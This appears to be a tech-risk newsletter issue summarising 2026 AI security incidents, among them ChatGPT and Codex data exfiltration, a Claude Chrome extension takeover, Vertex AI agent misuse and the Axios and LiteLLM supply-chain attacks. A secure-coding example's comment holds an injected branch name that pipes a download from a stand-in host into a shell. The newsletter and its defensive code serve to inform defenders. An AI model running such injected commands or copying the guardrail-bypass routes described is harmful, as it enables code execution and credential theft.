Tech Risk #164: Anthropic source code leak
Plus, Claude Chrome extension’s flaw, managing the security debt of AI outputs, securing the future of agentic AI, supply chain attacks, and more!
Tech Risk Reading Picks
Anthropic source code leak: A packaging error on the NPM registry recently led Anthropic to inadvertently publish the internal source code for Claude Code. A 60 MB source map file allowed the reconstruction of nearly 500,000 lines of code across 1,900 files. While no customer data or credentials were compromised, the leak exposed proprietary features such as Proactive and Dream modes. Separately, Anthropic is investigating a high-priority bug causing users to exhaust their message limits prematurely. The company is currently issuing DMCA notices to remove the leaked code and working to resolve the usage-limit issues. [more]
Claude Chrome extension’s flaw: A critical security flaw discovered in the Claude Chrome extension allowed attackers to gain full control over user accounts without any direct interaction. Simply by visiting a malicious website, users could have their session tokens stolen, emails sent on their behalf, and private chat histories exported. The vulnerability stemmed from an overly broad trust policy combined with a bug in a third-party CAPTCHA component. Anthropic and Arkose Labs patched the issue in February 2026. This incident highlights the significant risks of granting AI assistants broad permissions to act as autonomous agents within a web browser. [more]
Managing the security debt of AI outputs: Modern businesses increasingly rely on open-source components for operational efficiency, yet this reliance has created a substantial "security debt" characterized by fragmented vulnerability data and complex supply chain risks. Public databases often fail to provide timely or accurate severity scores for open-source flaws, leading to a dangerous gap between the discovery of a vulnerability and the availability of actionable intelligence. This problem is exacerbated by the presence of unmaintained "legacy" code and the rapid rise of malicious packages within popular registries. While AI agents are being integrated to accelerate development, they could introduce further risk by recommending obsolete or hallucinated libraries and generating code with systemic security flaws. Consequently, organizations must evolve beyond traditional patch management to implement more rigorous download policies, software build protections, and specialized oversight for AI-driven development. [more]
Google AI agents can be weaponized by an attacker: Cybersecurity researchers have identified a significant security flaw within Google Cloud’s Vertex AI platform involving excessive default permissions. This "blind spot" allows attackers to weaponize AI agents to bypass isolation boundaries and access sensitive data across an organization's cloud environment. By exploiting the default service agent's broad access, an attacker can extract credentials to steal proprietary data from cloud storage or map internal infrastructure. Google has responded by updating documentation and recommending that organizations manually configure service accounts to restrict access. Failure to address these default settings transforms a functional AI tool into a sophisticated insider threat capable of compromising entire project ecosystems. [more]
Securing the future of agentic AI: The emergence of agentic AI introduces a shift from simple “bad output” to complex “bad outcomes,” where autonomous systems can misinterpret instructions or misuse enterprise identities across workflows. To address these evolving threats, Microsoft has aligned its Copilot Studio and Agent 365 platforms with the 2026 OWASP Top 10 for Agentic Applications. This framework identifies critical risks such as goal hijacking and cascading failures that occur when agents act with broad permissions or lack clear behavioral boundaries. By treating agents as managed, auditable applications rather than autonomous black boxes, organizations can implement real-time protections and predefined connectors to constrain behavior. This strategic approach ensures that high-value business automation remains governable, observable, and secure against sophisticated adversarial manipulation. [more]
Addressing hidden vulnerabilities in enterprise AI environments: Security researchers recently identified critical vulnerabilities in OpenAI’s ChatGPT and Codex platforms that allowed for the silent exfiltration of sensitive data and credentials. One flaw exploited a DNS-based side channel within the AI’s Linux runtime to bypass standard guardrails, enabling attackers to leak conversation logs and files without triggering user warnings. A separate command injection vulnerability in the Codex engineering agent permitted the theft of GitHub authentication tokens through manipulated branch names. While OpenAI has patched these specific issues, the findings reveal a significant security blind spot where AI systems operate under the false assumption of environment isolation. These incidents highlight that native AI safeguards are currently insufficient for protecting high-value enterprise intellectual property and sensitive data.
Unauthorized GitHub token exfiltration: OpenAI recently patched a critical command injection vulnerability in its Codex AI coding assistant that allowed attackers to steal sensitive GitHub User Access Tokens. The flaw originated from improper input sanitization of GitHub branch names, which the system failed to validate before executing commands within its cloud-hosted containers. By crafting a malicious branch name containing hidden shell commands, an attacker could trigger unauthorized code execution whenever a developer interacted with a compromised repository. This exploit enabled the silent extraction of authentication tokens, potentially granting attackers broad access to private source code and organizational resources across the GitHub environment. [more]
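The injection pattern described above is easy to reproduce in miniature. The sketch below is a generic illustration, not OpenAI’s actual code; the helper names and the allowlist regex are hypothetical. It contrasts interpolating an untrusted branch name into a shell string with validating the name and passing it as a plain argument:

```python
import re
import subprocess

# Hypothetical allowlist for acceptable branch-name characters.
BRANCH_RE = re.compile(r"^[A-Za-z0-9._/-]+$")

def checkout_unsafe(branch: str) -> None:
    # VULNERABLE pattern: the branch name is interpolated into a shell
    # command, so a name like "main; curl attacker.example | sh" would
    # execute arbitrary commands inside the container.
    subprocess.run(f"git checkout {branch}", shell=True, check=True)

def checkout_safe(branch: str) -> None:
    # Safer pattern: validate the name against an allowlist, then pass it
    # as a single argv element (no shell), with "--" so it cannot be
    # interpreted as an option flag.
    if not BRANCH_RE.fullmatch(branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    subprocess.run(["git", "checkout", "--", branch], check=True)
```

Because the safe variant never invokes a shell, metacharacters such as `;`, `|`, and `&&` are inert even if validation were bypassed; the allowlist adds defense in depth.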
“ModelSpy” attack system steals AI model architectures at a distance: A research team from KAIST, the National University of Singapore, and Zhejiang University has identified a critical security vulnerability that allows for the remote theft of artificial intelligence model architectures. Using a system called ModelSpy, attackers can capture electromagnetic signals emitted by GPUs during AI computations from up to six meters away, even through walls. This side-channel attack achieves up to 97.6% accuracy in reconstructing deep learning layer configurations without needing direct server access or malware. To mitigate this risk, researchers recommend implementing electromagnetic interference and computational obfuscation as part of a comprehensive cyber-physical security strategy. [more]
AI exploits FreeBSD kernel: A recent security milestone demonstrated that a frontier AI model autonomously discovered and weaponized a critical vulnerability in the FreeBSD operating system, a platform renowned for its high security and used by major enterprises like Netflix and WhatsApp. Moving beyond simple bug detection, the AI agent engineered a sophisticated, multi-stage exploit in just four hours of compute time, achieving root-level access that typically requires weeks of specialized human labor. This shift marks the transition from AI as a supportive tool to an autonomous actor capable of conducting high-level offensive operations. As the cost and time required to develop “zero-day” style exploits collapse, the traditional security advantage held by mature codebases is eroding, necessitating a radical acceleration in defensive response and patching cycles. [more]
Critical vulnerability in the Langflow framework: The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning regarding a critical vulnerability (CVE-2026-33017) in the Langflow framework, which is widely used for developing AI agents. This flaw allows unauthorized remote code execution, enabling attackers to gain control over systems by sending a single malicious web request. Hackers began exploiting the weakness within 20 hours of its public disclosure, highlighting the speed at which modern threats materialize. Federal agencies must patch their systems by April 8, but all organizations using Langflow are advised to upgrade to version 1.9.0 or higher immediately. Failure to address this issue could lead to the theft of sensitive data, including database credentials and cloud secrets stored within AI development environments. [more]
Supply chain attacks
Attack on open-source project LiteLLM: The AI recruiting startup Mercor recently confirmed a security incident resulting from a supply chain attack targeting the open-source project LiteLLM. As a critical partner for major AI firms like OpenAI, Mercor was impacted when malicious code was distributed through compromised PyPI package releases. While Mercor has engaged forensic experts to contain the breach, the hacking group Lapsus$ claims to have exfiltrated hundreds of gigabytes of corporate data. A clean version of the affected software has since been released, but investigations into the full extent of the data exposure are ongoing. [more]
Attack on Axios: North Korean threat actors executed a premeditated supply chain attack by hijacking the npm account of the primary maintainer for Axios, a library used by millions of developers. The attackers bypassed secure GitHub Actions workflows by compromising the maintainer’s account, changing the associated email, and utilizing a long-lived access token to publish malicious versions via the npm command line interface. This breach resulted in the distribution of versions 1.14.1 and 0.30.4, which contained a remote access trojan hidden within a sub-dependency. The malware targeted Windows, macOS, and Linux systems by executing automatically during the package installation process. Security teams removed the poisoned updates within hours, but the incident demonstrates the extreme vulnerability of automated build pipelines to compromised third-party credentials. [more]
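Malware that "executes automatically during the package installation process" typically rides on npm lifecycle scripts. The fragment below is a generic sketch of the mechanism, not the actual Axios payload (the package name and script file are hypothetical): any dependency can declare a `postinstall` hook, and npm runs it with the installing user’s privileges.

```json
{
  "name": "innocuous-subdependency",
  "version": "0.30.4",
  "scripts": {
    "postinstall": "node ./setup.js"
  }
}
```

Installing with `npm install --ignore-scripts`, or setting `ignore-scripts=true` in `.npmrc`, blocks this execution path entirely, at the cost of breaking packages that legitimately rely on install hooks (e.g., for compiling native addons).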

